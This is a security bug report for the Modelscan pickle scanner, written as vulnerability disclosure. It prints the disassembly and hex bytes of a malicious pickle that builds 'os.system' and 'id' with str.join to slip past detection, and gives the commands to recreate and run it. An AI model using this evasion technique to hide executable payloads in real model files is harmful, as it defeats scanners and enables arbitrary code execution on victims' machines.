[BUG] Security Vulnerability #331
Description
Describe the bug
Modelscan scanned a malicious pickle file using defaults and reported no issues.
To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:
0: \x80 PROTO 4
2: \x95 FRAME 240
11: \x8c SHORT_BINUNICODE 'importlib'
22: \x8c SHORT_BINUNICODE 'import_module'
37: \x93 STACK_GLOBAL
38: \x94 MEMOIZE (as 0)
39: \x8c SHORT_BINUNICODE 'builtins'
49: \x85 TUPLE1
50: R REDUCE
51: \x94 MEMOIZE (as 1)
52: \x8c SHORT_BINUNICODE 'builtins'
62: \x8c SHORT_BINUNICODE 'getattr'
71: \x93 STACK_GLOBAL
72: \x94 MEMOIZE (as 2)
73: h BINGET 2
75: h BINGET 1
77: \x8c SHORT_BINUNICODE 'str'
82: \x86 TUPLE2
83: R REDUCE
84: \x8c SHORT_BINUNICODE 'join'
90: \x86 TUPLE2
91: R REDUCE
92: \x8c SHORT_BINUNICODE ''
94: ] EMPTY_LIST
95: ( MARK
96: \x8c SHORT_BINUNICODE 'o'
99: \x8c SHORT_BINUNICODE 's'
102: e APPENDS (MARK at 95)
103: \x86 TUPLE2
104: R REDUCE
105: \x94 MEMOIZE (as 3)
106: h BINGET 2
108: h BINGET 2
110: h BINGET 1
112: \x8c SHORT_BINUNICODE 'str'
117: \x86 TUPLE2
118: R REDUCE
119: \x8c SHORT_BINUNICODE 'join'
125: \x86 TUPLE2
126: R REDUCE
127: \x8c SHORT_BINUNICODE ''
129: ] EMPTY_LIST
130: ( MARK
131: \x8c SHORT_BINUNICODE 's'
134: \x8c SHORT_BINUNICODE 'y'
137: \x8c SHORT_BINUNICODE 's'
140: \x8c SHORT_BINUNICODE 't'
143: \x8c SHORT_BINUNICODE 'e'
146: \x8c SHORT_BINUNICODE 'm'
149: e APPENDS (MARK at 130)
150: \x86 TUPLE2
151: R REDUCE
152: \x94 MEMOIZE (as 4)
153: h BINGET 2
155: h BINGET 2
157: h BINGET 1
159: \x8c SHORT_BINUNICODE 'str'
164: \x86 TUPLE2
165: R REDUCE
166: \x8c SHORT_BINUNICODE 'join'
172: \x86 TUPLE2
173: R REDUCE
174: \x8c SHORT_BINUNICODE ''
176: ] EMPTY_LIST
177: ( MARK
178: \x8c SHORT_BINUNICODE 'i'
181: \x8c SHORT_BINUNICODE 'd'
184: e APPENDS (MARK at 177)
185: \x86 TUPLE2
186: R REDUCE
187: \x94 MEMOIZE (as 5)
188: h BINGET 2
190: h BINGET 1
192: \x8c SHORT_BINUNICODE 'getattr'
201: \x86 TUPLE2
202: R REDUCE
203: \x8c SHORT_BINUNICODE 'builtins'
213: \x8c SHORT_BINUNICODE '__import__'
225: \x93 STACK_GLOBAL
226: \x94 MEMOIZE (as 6)
227: \x94 MEMOIZE (as 7)
228: h BINGET 3
230: \x85 TUPLE1
231: R REDUCE
232: h BINGET 4
234: \x86 TUPLE2
235: R REDUCE
236: h BINGET 5
238: \x85 TUPLE1
239: R REDUCE
240: \x94 MEMOIZE (as 8)
241: \x8c SHORT_BINUNICODE 'gottem'
249: \x94 MEMOIZE (as 9)
250: b BUILD
251: . STOP
- Run
echo "800495f0000000000000008c09696d706f72746c69628c0d696d706f72745f6d6f64756c6593948c086275696c74696e738552948c086275696c74696e738c07676574617474729394680268018c0373747286528c046a6f696e86528c005d288c016f8c0173658652946802680268018c0373747286528c046a6f696e86528c005d288c01738c01798c01738c01748c01658c016d658652946802680268018c0373747286528c046a6f696e86528c005d288c01698c016465865294680268018c076765746174747286528c086275696c74696e738c0a5f5f696d706f72745f5f939494680385526804865268058552948c06676f7474656d94622e" | xxd -r > str_concat_bypass.pkl - Run
python3 -m pickle str_concat_bypass.pkland the output for theidcommand should be displayed in stdout. - Run
modelscan -p str_concat_bypass.pklto see that no issues were found
Expected behavior
Modelscan reports the following on this file:
--- Summary ---
Total Issues: 2
Total Issues By Severity:
- LOW: 0
- MEDIUM: 0
- HIGH: 0
- CRITICAL: 2
--- Issues by Severity ---
--- CRITICAL ---
Unsafe operator found:
- Severity: CRITICAL
- Description: Use of unsafe operator '__import__' from module 'builtins'
- Source: <path>/string_concat_bypass.pkl
Unsafe operator found:
- Severity: CRITICAL
- Description: Use of unsafe operator 'getattr' from module 'builtins'
- Source: <path>/string_concat_bypass.pkl
However, os.system('id') is not caught since this string is split up before it's merged using str.join
Environment (please complete the following information):
- OS: Debian Linux
- Modelscan Version 0.8.7